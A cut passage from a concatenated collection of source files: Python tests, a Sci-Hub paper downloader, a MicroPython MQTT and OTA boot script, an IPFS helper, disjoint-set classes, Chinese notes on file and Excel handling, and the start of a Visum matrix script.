self.assertEqual(len(seen), constants.K)\n self.assertEqual(len(peers_for_blob[blob_hash]), len(seen))\n\n for pg in range(1, peers_for_blob[b'p']):\n page_x = await peer.find_value(blob_hash, pg)\n self.assertNotIn(b'contacts', page_x)\n page_x_set = set(page_x[blob_hash])\n self.assertEqual(len(page_x[blob_hash]), len(page_x_set))\n self.assertGreater(len(page_x_set), 0)\n self.assertSetEqual(seen.intersection(page_x_set), set())\n seen.intersection_update(page_x_set)\n total_seen.update(page_x_set)\n else:\n self.assertEqual(len(peers_for_blob[b'contacts']), i - 1)\n self.assertEqual(len(total_seen), peer_count - 2)\n","sub_path":"tests/unit/dht/test_blob_announcer.py","file_name":"test_blob_announcer.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"247519150","text":"#!/usr/bin/env python\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Jiao Lin\n# California Institute of Technology\n# (C) 2007 All Rights Reserved \n#\n# {LicenseText}\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n\n\n\nimport unittestX as unittest\nimport journal\n\n\nclass TestCase(unittest.TestCase):\n\n def test(self):\n from mcstas2.utils.parsers.McStasInstrumentParser import McStasInstrumentParser\n parser = McStasInstrumentParser()\n path = '../../../../../../../instruments/VULCAN/resources/vulcan_asbuilt_L2d.instr'\n text = open(path).read()\n instrument = parser.parse(text)\n return\n\n pass # end of TestCase\n\n\n\ndef pysuite():\n suite1 = unittest.makeSuite(TestCase)\n return unittest.TestSuite( (suite1,) )\n\n\ndef main():\n #debug.activate()\n #journal.debug(\"CompositeNeutronScatterer_Impl\").activate()\n pytests = pysuite()\n alltests = unittest.TestSuite( (pytests, ) )\n res = unittest.TextTestRunner(verbosity=2).run(alltests)\n import sys; sys.exit(not res.wasSuccessful())\n\n \n \nif __name__ == \"__main__\":\n main()\n \n# version\n__id__ = \"$Id$\"\n\n# End of file \n","sub_path":"packages/legacycomponents/mcstas2/tests/mcstas2/utils/parsers/instrumentparser_TestCase.py","file_name":"instrumentparser_TestCase.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"179401126","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport re # 正则模块\nimport requests\nimport os\n\n\naddress = input('\\n输入DOI/链接/标题:')\nos.chdir('E:') # 设置文件保存的位置\nr = requests.post('https://sci-hub.st/', data={'request': address})\nprint('\\n响应结果是:', r)\nprint('访问的地址是:', r.url)\nsoup = BeautifulSoup(r.text, features='lxml')\npdf_URL = soup.iframe['src']\nif re.search(re.compile('^https:'), pdf_URL):\n pass\nelse:\n pdf_URL = 'https:'+pdf_URL\nprint('PDF的地址是:', pdf_URL)\nname = re.search(re.compile('fdp.*?/'),pdf_URL[::-1]).group()[::-1][1::]\nprint('PDF文件名是:', name)\nprint('保存的位置在:', os.getcwd())\nprint('\\n正在下载')\nr = requests.get(pdf_URL, stream=True)\nwith open(name, 'wb') as f:\n for chunk in r.iter_content(chunk_size=32):\n f.write(chunk)\nprint('下载完成!')","sub_path":"04. Python学习/用爬虫在sci-hub上下载文献.py","file_name":"用爬虫在sci-hub上下载文献.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"390045328","text":"import os\nimport cv2\nimport sys\nimport glob\nsys.path.append('model/')\nfrom model.PieAPPv0pt1_KERAS import PieAPP\nimport argparse\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR)\n\n####### check for model and download if not present\nif not len(glob.glob('weights/PieAPP_model_v0.1.ckpt.*')) == 3:\n\tprint (\"downloading dataset\")\n\tos.system(\"bash scripts/download_PieAPPv0.1_TF_weights.sh\")\n\tif not len(glob.glob('weights/PieAPP_model_v0.1.ckpt.*')) == 3:\n\t\tprint (\"PieAPP_model_v0.1.ckpt files not downloaded\")\n\t\tsys.exit()\n \ndef compare_PieAPP(imageRef, imageA, gpu_id='', sampling_mode='sparse'):\n assert sampling_mode=='sparse' or sampling_mode=='dense', 'sampling_mode must be sparce or dense, received '+sampling_mode\n \n os.environ['CUDA_VISIBLE_DEVICES'] = gpu_id\n \n if sampling_mode == 'sparse':\t\n stride_val = 27\n if sampling_mode == 'dense':\n stride_val = 6\n \n pieModel = PieAPP()\n pieModel.load_weights('weights/PieAPP_model_v0.1.ckpt.meta')\n return pieModel.predict(imageRef, imageA, strides=stride_val)\n \nif __name__=='__main__':\n ######## input args\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ref_path\", dest='ref_path', type=str, default='imgs/ref.png', help=\"specify input reference\")\n parser.add_argument(\"--A_path\", dest='A_path', type=str, default='imgs/A.png', help=\"specify input image\")\n parser.add_argument(\"--sampling_mode\", dest='sampling_mode', type=str, default='sparse', help=\"specify sparse or dense sampling of patches to compte PieAPP\")\n parser.add_argument(\"--gpu_id\", dest='gpu_id', type=str, default='', help=\"specify which GPU to use (don't specify this argument if using CPU only)\")\n \n args = parser.parse_args()\n \n # open images\n imageRef = cv2.imread(args.ref_path)\n imageA = cv2.imread(args.A_path)\n \n compared = compare_PieAPP(imageRef, imageA, args.gpu_id, args.sampling_mode)\n \n print ('PieAPP value of '+args.A_path+ ' with respect to: '+str(compared))","sub_path":"test_PieAPP_KERAS.py","file_name":"test_PieAPP_KERAS.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528323002","text":"import time, machine, update, wifisettings, nodesettings, lib.requests, lib.logger, lib.requests, lib.timew, time, os, machine\nfrom umqtt.robust import MQTTClient\nfrom machine import Pin, WDT\nled = Pin(2, Pin.OUT)\nled.off()\n\nt = lib.timew.Time(time=time)\n\n# Configure Logger\nlogger = lib.logger.config(enabled=nodesettings.settings['debug'], include=nodesettings.settings['logInclude'], exclude=nodesettings.settings['logExclude'], time=t)\nlog = logger(append='boot')\nlog(\"The current time is %s\" % t.human())\n\nmqtt_pth = nodesettings.settings['controllerName']\nclient = MQTTClient(mqtt_pth, \nwifisettings.settings['mqtt_ip'], \nport=wifisettings.settings['mqtt_port'])\n\nmq_c = False\nfor i in range(1):\n try:\n client.connect()\n mq_c = True\n except:\n log('MQTT: cannot connect')\n led.on()\n time.sleep(1)\nif not mq_c:\n log ('MQTT: giving up, resetting')\n time.sleep(1)\n machine.reset()\nlog('MQTT: connected OK')\nled.off()\n\ndef mqtt_pub(tag, data, retain=False):\n \"\"\"publish a message to the MQTT broker\"\"\"\n client.publish(mqtt_pth+\"/\"+tag, \n data, retain)\n\ndef mqtt_sub(sub_callback):\n \"\"\"subscribe to MQTT topic given by controllername and register a callback\"\"\"\n client.set_callback(sub_callback)\n client.subscribe(mqtt_pth+\"/#\")\n print(\"MQTT SUBSCRIBED TO: \", repr(mqtt_pth+\"/#\"))\n \ndef mqtt_ping():\n \"\"\"ping the MQTT broker\"\"\"\n client.ping()\n\nloggerOta = logger(append='OTAUpdater')\n\nio = update.IO(os=os, logger=loggerOta)\ngogs = update.Gogs(\n remote=nodesettings.settings['gogsRemote'],\n branch=nodesettings.settings['gogsBranch'],\n token=nodesettings.settings['gogsToken'],\n requests = lib.requests,\n io=io,\n logger=loggerOta,\n)\nupdater = update.OTAUpdater(io=io, gogs=gogs, logger=loggerOta, machine=machine)\n\ntry:\n updater.update()\n log('OTA update OK')\n mqtt_pub(\"boot/status\", \"OTA_OK\")\n led.off()\nexcept Exception as e:\n log('Failed to OTA update:', e)\n mqtt_pub(\"boot/status\", \"OTA_error\")\n led.on()\n\n\nenv = {}\nenv.update(nodesettings.settings)\nenv['requests'] = lib.requests\nenv['log'] = logger(append='main')\nenv['time'] = t\nenv['updater'] = updater\n\nenv['wdt'] = WDT(timeout=5000) # watchdog timer. If feed() is not called every 5000ms (max) the system will reset.\n # the main loop (within src.main.start) calls feed() periodically but will stop doing so in case of an exception\n # If communication to the MQTT broker fails, an exception will occur.\n # Thus, the system can be remote-reset by stopping the MQTT broker.\n # Due to measures in micropython-ota-updater-gogs/src/main.py, the system will then boot-loop \n # until the MQTT server is accesible again, and then check for an OTA update.\n # In summary, after an update of the node code has been published on Gogs, nodes can be forced to load it \n # by stopping the MQTT broker service for a short while. \n\n\nenv['mqtt_pub'] = mqtt_pub\nenv['mqtt_ping'] = mqtt_ping\nenv['mqtt_sub'] = mqtt_sub\nenv['mqtt_check_msg'] = client.check_msg\nenv['wdt'].feed() # first food for watchdog\n\nlog('launching src.main.start()')\nimport src.main\nsrc.main.start(env)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448575223","text":"import pathlib\n\nimport httpx\nfrom loguru import logger\n\nfrom .config import CONFIG\nfrom .Messenger import messenger\nfrom .utils import async_time_execution, get_headers, service_is_up\n\nIPFS_GATEWAY_ADDRESS: str = CONFIG.ipfs_gateway.ipfs_server_uri\n\n\n@async_time_execution\nasync def publish_file(rfid_card_id: str, file_path: pathlib.Path) -> tuple[str, str]:\n \"\"\"publish a provided file to IPFS using the Feecc gateway and return it's CID and URL\"\"\"\n if not CONFIG.ipfs_gateway.enable:\n raise ValueError(\"IPFS Gateway disabled in config\")\n\n if not service_is_up(IPFS_GATEWAY_ADDRESS):\n message = \"IPFS gateway is not available\"\n messenger.error(\"IPFS шлюз недоступен\")\n raise ConnectionError(message)\n\n file_path = pathlib.Path(file_path)\n headers: dict[str, str] = get_headers(rfid_card_id)\n base_url = f\"{IPFS_GATEWAY_ADDRESS}/publish-to-ipfs\"\n\n async with httpx.AsyncClient(base_url=base_url, timeout=None) as client:\n if file_path.exists():\n with file_path.open(\"rb\") as f:\n files = {\"file_data\": f}\n response: httpx.Response = await client.post(url=\"/upload-file\", headers=headers, files=files)\n else:\n json = {\"absolute_path\": str(file_path)}\n response = await client.post(url=\"/by-path\", headers=headers, json=json)\n\n if response.is_error:\n messenger.error(f\"Ошибка шлюза IPFS: {response.json().get('detail', '')}\")\n raise httpx.RequestError(response.json().get(\"detail\", \"\"))\n\n assert int(response.json().get(\"status\", 500)) == 200, response.json()\n\n cid: str = response.json().get(\"ipfs_cid\")\n link: str = response.json().get(\"ipfs_link\")\n assert cid and link, \"IPFS gateway returned no CID\"\n\n logger.info(f\"File '{file_path} published to IPFS under CID {cid}'\")\n\n return cid, link\n","sub_path":"src/feecc_workbench/ipfs.py","file_name":"ipfs.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"523534844","text":"class DisjointSetForest:\n \"\"\"Forest representation of Disjoint Set.\n \"\"\"\n class _Node:\n \"\"\"Internal Node\n \"\"\"\n def __init__(self, data, rank=0):\n self.data = data\n self.rank = rank\n self.next = self\n self.parent = self\n\n def __repr__(self):\n return f\"(({self.data}) {self.rank})\"\n\n def make_set(self, data):\n \"\"\"Make a new set and return it.\n\n It just create a tree with a root node with the data.\n \"\"\"\n return self._Node(data)\n\n def find_set(self, node):\n \"\"\"Find the representative of the set of the node.\n \"\"\"\n if node is not node.parent:\n node.parent = self.find_set(node.parent)\n\n return node.parent\n\n def union_set(self, node1, node2):\n \"\"\"Union two set of the two nodes and return it.\n \"\"\"\n if node1 is node2:\n return self.find_set(node1)\n\n root1 = self.find_set(node1)\n root2 = self.find_set(node2)\n\n if root1 is root2:\n return root1\n\n if root1.rank < root2.rank:\n root1, root2 = root2, root1\n\n root2.parent = root1\n root1.next, root2.next = root2.next, root1.next\n\n if root1.rank == root2.rank:\n root1.rank += 1\n\n return root1\n\n def print_set(self, node, *, sep=' ', end='\\n'):\n \"\"\"Print the node in the set with unordered.\n \"\"\"\n tmp = node\n\n while tmp.next is not node:\n print(tmp.data, end=sep)\n tmp = tmp.next\n\n print(tmp.data, end=end)\n\n\nclass DisjointSetForestWithList:\n \"\"\"Forest representation of Disjoint Set.\n \"\"\"\n def __init__(self, *, size):\n self.parent = [-1 for i in range(size)]\n self.next = [-1 for i in range(size)]\n self.rank = [-1 for i in range(size)]\n\n def make_set(self, data):\n \"\"\"Make a new set and return it.\n\n It just create a tree with a root node with the data.\n \"\"\"\n self.parent[data] = data\n self.next[data] = data\n self.rank[data] = 0\n\n def find_set(self, node):\n \"\"\"Find the representative of the set of the node.\n \"\"\"\n if node != self.parent[node]:\n self.parent[node] = self.find_set(self.parent[node])\n\n return self.parent[node]\n\n def union_set(self, node1, node2):\n \"\"\"Union two set of the two nodes and return it.\n \"\"\"\n root1 = self.find_set(node1)\n root2 = self.find_set(node2)\n\n if root1 == root2:\n return root1\n\n if self.rank[root1] < self.rank[root2]:\n root1, root2 = root2, root1\n\n self.parent[root2] = root1\n self.next[root1], self.next[root2] = self.next[root2], self.next[root1]\n\n if self.rank[root1] == self.rank[root2]:\n self.rank[root1] += 1\n\n return root1\n\n def print_set(self, node, *, sep=' ', end='\\n'):\n \"\"\"Print the node in the set with unordered.\n \"\"\"\n tmp = node\n\n while self.next[tmp] != node:\n print(tmp, end=sep)\n tmp = self.next[tmp]\n\n print(tmp, end=end)\n","sub_path":"algorithms/disjoint_set/forest.py","file_name":"forest.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"649865791","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'app'\n\nurlpatterns = [\n\tpath('', views.home, name='home'),\n\tpath('vlogin/', views.vlogin, name='vlogin'),\n\tpath('slogin/', views.slogin, name='slogin'),\n\tpath('ssignup/', views.ssignup, name='ssignup'),\n\tpath('vsignup/', views.vsignup, name='vsignup'),\n\tpath('ind/', views.ind, name='ind'),\n\tpath('shg/', views.shg, name='shg'),\n\tpath('vdashboard/', views.vdashboard, name='vdashboard'),\n]","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"469633420","text":"#!/sur/bin/python\n# -*-coding:utf-8-*-\n\n#open(): 打开文件,txt文件,Excel\n#如何查看代码\n# 1.选中\n# 2.Ctrl+ b\n\n#open()\n\n\"\"\"\n常用参数\n1.file: 文件的名字,a.txt b.excel\n2.mode='r' 读取文件的模式 r——读取模式 w——写入模式 a——追加写入模式\n b——二进制写入 + 追加 读写\n3。encoding=None 指定文件的编码方式 utf - 8 gbk\n\"\"\"\n\n\n#写入过程\n# f = open(\"b.txt\",mode=\"w\",encoding=\"utf-8\")\n# # write() 写入 传入字符串 想写入的文字\n# f.write(\"hello,python \\nsdfsafsdfs\")\n# # close() 关闭\n# f.close()\n\n\n#读取文件\n# f = open(\"a.txt\",mode=\"r\",encoding=\"utf-8\")\n# # read() 读取文件中所有内容\n# text=f.read()\n# print(text)\n# f.close()\n\n# #例子 ;写入\n# a = [\"a\",\"b\",\"c\"]\n# f = open(\"a.txt\",mode=\"w\",encoding=\"utf-8\")\n# for i in a:\n# f.write(i+\"\\n\")\n# f.write(f\"{i}\\n\")\n# f.write(\"a\\n\"\"b\\n\"\"c\\n\")\n# f.close()\n\n\n# f = open(\"b.txt\",mode=\"r\",encoding=\"utf-8\")\n#readlines(n) 每次读取一行, n有数值,只读取数值的行数\n# text= f.readlines(1) # 返回一个列表\n# c =[]\n# for j in text:\n# c.append(j.strip())\n# print(c)\n# f.close()\n# print(text)\n#\n#\n# def wj(x):\n# f = open(file=x, mode=\"r\", encoding=\"utf-8\")\n# print(f.readlines(2))\n# b = []\n# for i in f:\n# b.append(i.strip())\n# f.close()\n# return f\n# wj(\"a.txt\")\n\n\n\n\n\n\n\n\n\n\n\n\n# python读取Excel表格中的数据,需要使用的第三方包(pip install excel)\nimport xlrd\n\n# 打开Excle文件\n# d = xlrd.open_workbook(filename=\"12.xls\")\n# 获取Excel表格,返回的是一个包含所有excel的表格\n# 假设文件中存在两个excel表,那么列表中【‘sheetl’‘sheet2’】\n# table = d.sheets()[0]\n# # 获取表中的数据 row_values() 获取整行的数据,必须指定获取的行号\n# x = table.row_values(1,0) # 行从0开始,后一个是从那一列开始\n# y = table.row_values(0,1)\n#print(x)\n# print(y)\n# #\n# # 获取某个单元格的值 先通过row获取某一行,返回列表,在通过列表索引获取元素,通过【.value】获取到具体的值\n# dan = table.row(0)[1].value\n#print(dan)\n# # # 获取某一列的值, 先通过col获取某一列,返回列表,在通过列表索引获取元素,通过【.value】获取到具体的值\n# lie = table.col(1)[1].value\n#print(lie)\n# # # 获取某一行的某一列的值\n# huoqu = table.cell(0,1).value\n# print(huoqu)\n# # # 获取行数\n# hang = table.nrows\n#print(hang)\n# # # 获取列数\n#lieshu = table.ncols\n# print(lieshu)\n# # # 通过行数获取所有的数据\n# for i in range(hang):\n# print(table.row_values(i))\n# #\n# # # 通过列数获取所有的数据\n# b = table.col_values(1) # 获取整列的数据\n# print(b)\n\n#for j in range(lieshu):\n #print(table.col_values(j))\n#\n# #打印/输出 excel表得名字 d 代表打开excel文件\n#print(d.sheet_names()) #找出文件中所有表的名字\n#\n#\n# # 通过索引获取表\n# # 假设一个文件存在两个表sheet1,sheet2, sheet_by_index(): 0 打开的就是sheet1\n# table = d.sheet_by_index(0)\n# print(table)\n\n\n\n\n# 打开某个表格,并将所有的内容保存到txt文档中\n# class Excel(object):\n# def __init__(self,name,num):\n# self.d = xlrd.open_workbook(filename=name) # 打开文件\n# # 使用某一张表\n# self.t = self.d.sheets()[num] #d.sheet_by_index(0) 两种方法#shuju = dui.data()#shuju =#shuju = dui.data() dui.data()\n# # data 方法的作用,获取一张表中的所有的数据\n# def a(self):\n# # 将所有数据装到一个列表中\n# biao = []\n# n = self.t.nrows # 获取行数\n# for i in range(n):\n# #print(self.t.row_values(i))\n# biao.append(self.t.row_values(i))\n# return biao\n# class Txt(Excel):\n# def write_data(self):\n# f = open(file=\"wen.txt\",mode=\"w\",encoding=\"utf-8\")\n# shuju = self.a() #shuju = dui.data()\n# for i in shuju:\n# print(i)\n# for j in i:\n# #print(j)\n# f.write(f\"{str(j)} \" '\\t')\n# f.write(\"\\n\")\n# t1 = Txt(\"12.xls\",0)\n# t1.write_data()\n\n\n\n# 向excel文件中写入数据 xlwt pip install xlwt\n# import xlwt\n# # 新建一个excel文件\n# d = xlwt.Workbook()\n# # 新建一个excel表 add_sheet(\"工作表的名字\") 必填\n# table = d.add_sheet(\"表1\")\n# # 写入数据到excel表中\n# # 一次写入一个单元格 第一个0是行,第二个0是列\n# table.write(0,0,\"张三\")\n# table.write(0,12,\"李四\")\n# # 保存文件 save(\"文件名\") 必填\n# d.save(\"7,3.xls\")\n\n\n# import xlwt\n#\n# a = [[\"序号\",\"名字\",\"年龄\",\"性别\"],[\"1\",\"王二\",\"12\",\"男\"],[\"2\",\"张三\",\"23\",\"女\"],[\"3\",\"李四\",\"12\",\"男\"],\n# [\"4\" ,\"赵六\",\"32\",\"女\"]]\n# d = xlwt.Workbook()\n# table = d.add_sheet(\"表1\")\n# for i in range(len(a)):\n# for j in range(len(a)-1):\n# table.write(i,j,a[i][j])\n# d.save(\"例子.xls\")\n\n\nimport xlwt\n# class A(object):\n# c = xlwt.Workbook() #新建excel文件\n# def __init__(self,biao,shuju):\n# self.table = self.c.add_sheet(\"表\") # 新建表\n# self.biao = biao\n# self.shuju = shuju\n# def b(self):\n# for i in range(len(self.shuju)):\n# for j in range(len(self.shuju[i])):\n# self.table.write(i,j,self.shuju[i][j])\n# self.c.save(self.biao) # 保存文件\n#\n# q = A(\"2.xls\",[['序号', '名字', '年龄', '性别'], [1.0, '张三', 20.0, '男'], [2.0, '李四', 19.0, '男'], [3.0, '王五', 18.0, '女'], [4.0, '赵信', 16.0, '女']])\n# q.b()\n\n\n\n\n\n\n\n\n\n#导入 (跨文件夹)\n# from 文件夹名字 import 脚本名\n\n#同文档导入\n# 第一种\n#from a import 脚本名 #导入全部 from a import *\n# 第二种\n#from 文件路径 import * # 文件路径= python.A.aa eg: from python.A.aa import * print(a) print(b)\n\n\n#将九九乘法表写入到txt文件\nclass A(object):\n def __init__(self,x):\n self.x = x\n self.f = open(\"c.txt\",mode=\"w\",encoding=\"utf-8\")\n def b(self):\n for i in range(1,self.x):\n for j in range(1,i+1):\n self.f.write(f\"{j}*{i}={i*j} \\t\")\n self.f.write(\"\\n\")\na = A(10)\na.b()\n\n\n\n\n\"\"\"\n#将九九乘法表写入到Excel文件\nimport xlwt\nclass A(object):\n def __init__(self,x):\n self.x = x\n # 新建一个excel文件\n self.d = xlwt.Workbook()\n # 新建一个excel表 必填\n self.table = self.d.add_sheet(\"表1\")\n def jiu(self):\n for i in range(1,self.x):\n for j in range(1,i+1):\n self.table.write(i-1,j-1,f\"{j}*{i}={i*j}\")\n # # 保存文件 save(\"文件名\") 必填\n self.d.save(\"99.xls\")\n\na = A(10)\na.jiu()\n\"\"\"\n\nimport xlwt\n# class A(object):\n# def __init__(self,x,y):\n# self.x = x\n# self.y = y\n# self.a = self.x + self.y\n# class B(A):\n# def b(self):\n# print(self.a)\n# c =B(1,2)\n# c.b()\n\n\n# class A(object):\n# def __init__(self,x):\n# self.x = x\n# self.d=xlwt.Workbook()\n# self.table = self.d.add_sheet(\"99\")\n# def b(self):\n# for i in range(1,self.x):\n# for j in range(1,i+1):\n# self.table.write(i-1,j-1,f\"{j}*{i}={i*j}\")\n# self.d.save(\"99.xls\")\n# a = A(10)\n# a.b()","sub_path":"python文件/资料/操作文件及表格.py","file_name":"操作文件及表格.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"295089580","text":"# -*- coding: utf-8 -*-\n# @Author: Alexander Sharov\n\n\ndef ancestors(child, p_tree):\n result = []\n result.append(child)\n while child in p_tree:\n child = p_tree[child]\n result.append(child)\n return result\n\n\np_tree = dict()\nn = int(input())\nfor i in range(n - 1):\n child, parent = input().split()\n p_tree[child] = parent\n\nm = int(input())\nfor i in range(m):\n child_1, child_2 = input().split()\n ancestors_for_1 = set(ancestors(child_1, p_tree))\n for ancestor in ancestors(child_2, p_tree):\n if ancestor in ancestors_for_1:\n print(ancestor)\n break\n","sub_path":"python_tutor/11/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35260152","text":"#!/usr/bin/env python3\n\nimport time\n\nfrom flask import Flask, Response\n\n\napp = Flask('generator')\n\n\n# fails\n# @app.route('/')\ndef gen():\n\tfor i in range(10):\n\t\tyield str(i)\n\t\ttime.sleep(i)\n\n@app.route('/')\ndef gen():\n\tdef gen():\n\t\tfor i in range(10):\n\t\t\tyield '%s\\n' % i\n\t\t\ttime.sleep(1) # simulate an expensive operation\n\treturn Response(gen(), mimetype='text/plain')\n\nif __name__ == '__main__':\n\tapp.run(host='localhost', port=8000)\n","sub_path":"flask_generator.py","file_name":"flask_generator.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"603056745","text":"# -*- coding:utf-8 -*-\nimport os\nimport os.path\nimport re\nimport codecs\n\nCN_NUM = {\n u'〇' : 0,\n u'一' : 1,\n u'二' : 2,\n u'三' : 3,\n u'四' : 4,\n u'五' : 5,\n u'六' : 6,\n u'七' : 7,\n u'八' : 8,\n u'九' : 9,\n\n u'零' : 0,\n u'壹' : 1,\n u'贰' : 2,\n u'叁' : 3,\n u'肆' : 4,\n u'伍' : 5,\n u'陆' : 6,\n u'柒' : 7,\n u'捌' : 8,\n u'玖' : 9,\n\n u'貮' : 2,\n u'两' : 2,\n}\nCN_UNIT = {\n u'十' : 10,\n u'拾' : 10,\n u'百' : 100,\n u'佰' : 100,\n u'千' : 1000,\n u'仟' : 1000,\n u'万' : 10000,\n u'萬' : 10000,\n u'亿' : 100000000,\n u'億' : 100000000,\n u'兆' : 1000000000000,\n}\n\nCN_POOLSTR=\"[u'〇'u'一'u'二'u'三'u'四'u'五'u'六'u'七'u'八'u'九'\" \\\n \"u'零'u'壹'u'贰'u'叁'u'肆'u'伍'u'陆'u'柒'u'捌'u'玖'\" \\\n \"u'貮'u'两'u'十'u'拾'u'百'u'佰'u'千'u'仟'u'万'u'萬'u'亿'u'億'u'兆']\"\n\n\n\ndef cn2dig(cn):\n lcn = list(cn)\n unit = 0 # 当前的单位\n ldig = [ ] # 临时数组\n\n while lcn:\n cndig = lcn.pop()\n\n if cndig in CN_UNIT:\n unit = CN_UNIT.get(cndig)\n if unit== 10000:\n ldig.append('w') # 标示万位\n unit = 1\n elif unit == 100000000:\n ldig.append('y') # 标示亿位\n unit = 1\n elif unit == 1000000000000: # 标示兆位\n ldig.append('z')\n unit = 1\n\n continue\n\n else:\n dig = CN_NUM.get(cndig)\n\n if unit:\n dig = dig * unit\n unit = 0\n\n ldig.append(dig)\n\n if unit == 10: # 处理10-19的数字\n ldig.append(10)\n\n ret = 0\n tmp = 0\n\n while ldig:\n x = ldig.pop()\n\n if x == 'w':\n tmp *= 10000\n ret += tmp\n tmp = 0\n\n elif x == 'y':\n tmp *= 100000000\n ret += tmp\n tmp = 0\n\n elif x == 'z':\n tmp *= 1000000000000\n ret += tmp\n tmp = 0\n\n else:\n tmp += x\n\n ret += tmp\n return ret\n\n # ldig.reverse()\n # print ldig\n # print CN_NUM[u'七']\n\nif __name__== '__main__':\n pass\n","sub_path":"chNum2Dig.py","file_name":"chNum2Dig.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338094080","text":"#! Python 3\n\nimport numpy\nimport Tkinter as Tk\nfrom VisumPy import helpers as helpers\n\n\n# Required date as an input\n\nclass window():\n def __init__(self):\n #Start root:\n self.root = Tk.Tk()\n self.root.attributes(\"-topmost\", True)\n\n #Label:\n Tk.Label(self.root,text=\"Set the required date You want to use to create the matrix\").pack()\n\n #Define object selector and pack it to the frame:\n self.textctrl=Tk.Entry(self.root)\n self.textctrl.insert(0,\"DD.MM.YYYY\")\n self.textctrl.pack()\n\n #Define buttons and pack it to the frame:\n self.button = Tk.Button(self.root, font=(\"Arial\", 10), text=\"OK\", command=self.ok)\n self.cancel_button = Tk.Button(self.root, font=(\"Arial\", 10), text=\"Cancel\", command=self.cancel)\n self.button.pack()\n self.cancel_button.pack()\n\n #Start window mainloop:\n self.root.mainloop()\n\n\n def ok(self):\n self.required_date = str(self.textctrl.get())\n if len(self.required_date) != 10:\n # tkMessageBox.showinfo(\"Title\", \"Please enter the date in the DD.MM.YYYY format.\")\n self.root.destroy()\n win = window()\n self.cont = True\n self.root.destroy()\n\n def cancel(self):\n self.cont = False\n self.root.destroy()\n\n\n#Start GUI:\nwin = window()\n\nwhile win.cont == True:\n\n required_date = win.required_date\n\n # Filter by the given date\n\n poi_filter = Visum.Filters.POIFilter(48)\n poi_filter.RemoveConditions()\n poi_filter.AddCondition(\"OP_NONE\", False, \"DATE\", 9, required_date, Position=-1)\n if poi_filter.UseFilter != True:\n poi_filter.UseFilter = True\n\n # Creating the clear matrix\n\n all_matrices = Visum.Net.Matrices.GetMultiAttValues(\"NO\", OnlyActive=False)\n new_matrix_no = all_matrices[-1][1] + 1 # Incrementing the last NO of matrix\n\n new_matrix = Visum.Net.AddMatrix(new_matrix_no, objectTypeRef=2, MatrixType=3)\n # objectTypeRef=2 - as for a zone-based matrix\n # MatrixType=3 - as for a demand matrix\n\n new_matrix.SetAttValue(\"NAME\", (\"Trip Requests_\" + str(required_date)))\n\n # Getting the matrix as an array\n\n new_matrix = helpers.GetMatrix(Visum, new_matrix_no)\n\n # Translation between zones no and array index\n\n zones = helpers.GetContainer(Visum, \"Zones\")\n zones_list = helpers.GetMulti(zones, \"NO\")\n zones_dict = {}\n i = 0\n for zone in zones_list:\n zones_dict[int(zone)] = i\n i += 1\n\n # Getting the trip requests for the filtered date\n\n trip_req_poi = helpers.GetContainer(Visum, \"POI: Trip Request\")\n trip_id = helpers.GetMulti(trip_req_poi, \"ID_INTERNA\", activeOnly=True)\n trip_type = helpers.GetMulti(trip_req_poi, \"O_D\", activeOnly=True)\n trip_zone = helpers.GetMulti(trip_req_poi, \"ZONE\", activeOnly=True)\n trip_passanger = helpers.GetMulti(trip_req_poi, \"TOTAL_PAS\", activeOnly=True)\n\n # O-D pair comparing\n for i in range(0, len(trip_id)/2):\n if trip_id[i] == trip_id[i+1]:\n if trip_type[i] == \"O\":\n origin_zone = trip_zone[i]\n j = i+1\n dest_zone = trip_zone[j]\n else:\n dest_zone = trip_zone[i]\n j = i + 1\n origin_zone = trip_zone[j]\n else:\n if trip_type[i] == \"O\":\n origin_zone = trip_zone[i]\n id_temp = trip_id[i]\n # First the D type POIs were imported and later the O type\n # due to that they are not pairs\n j = trip_id.index(id_temp, i+1, len(trip_id))\n dest_zone = trip_zone[j]\n else:\n dest_zone = trip_zone[i]\n id_temp = trip_id[i]\n j = trip_id.index(id_temp, i+1, len(trip_id))\n origin_zone = trip_zone[j]\n\n if origin_zone != 0 and dest_zone != 0:\n origin_row = zones_dict[origin_zone]\n destin_col = zones_dict[dest_zone]\n new_matrix[origin_row, destin_col] += 